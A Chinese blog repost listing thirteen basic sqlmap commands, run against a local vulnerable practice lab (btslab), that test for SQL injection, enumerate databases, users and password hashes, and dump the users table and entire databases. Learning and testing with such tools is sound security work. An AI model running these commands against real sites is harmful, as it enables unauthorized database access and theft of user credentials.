博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
sqlmap基本命令
阅读量:6985 次
发布时间:2019-06-27

本文共 1232 字,大约阅读时间需要 4 分钟。

1、查看版本sqlmap.py  --version2、查看帮助sqlmap.py  --help3、测试url是否有注入的可能sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=14、不询问用户,使用所有默认的配置,可能会触发WAF的告警sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --batch5、暴库(列出所有的数据库)sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dbs6、web当前使用的数据库sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --current-db7、当前使用数据库的用户sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --current-user8、列出数据库所有的用户sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --users9、列出数据库的用户和密码sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --passwords10、列出数据中所有的表sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --tables -D bts 11、列出数据库bts特定表users的结构,所有字段sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --columns -D bts -T users 12、脱裤 数据库bts,表users,字段username和passwordsqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dump -D bts -T users -C "username,password"13、脱裤,整个数据库sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dump-all

  

转载于:https://www.cnblogs.com/geekdc/p/6954279.html

你可能感兴趣的文章
BZOJ 1460 Pku2114 Boatherds
查看>>
适配器在JavaScript中的体现
查看>>
同一法
查看>>
snmp
查看>>
maya 专家模式
查看>>
[转]Shared——回调函数是什么
查看>>
本人对于netty框架的一些理解,怎么与网站上的websock建立连接
查看>>
SSM前后端分离及跨域
查看>>
json 和 table控件
查看>>
RabbitMQ基础概念详细介绍
查看>>
【es6】数组排重
查看>>
thinkphp字符截取函数msubstr()
查看>>
(42) Aeroo 模板实战
查看>>
NetSetMan IP地址切换工具
查看>>
20050708:我还是忍忍吧
查看>>
Android系统移植与驱动开发概述
查看>>
鼠标滑过,解决ul下 li下a的背景与父级Li不同宽的问题
查看>>
为何毕业即失业
查看>>
技术准备工作
查看>>
介绍Windows Azure移动服务:用于您连接的客户端应用程序的后端
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-02-05 06:37:20   当前IP: 52.15.56.156   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我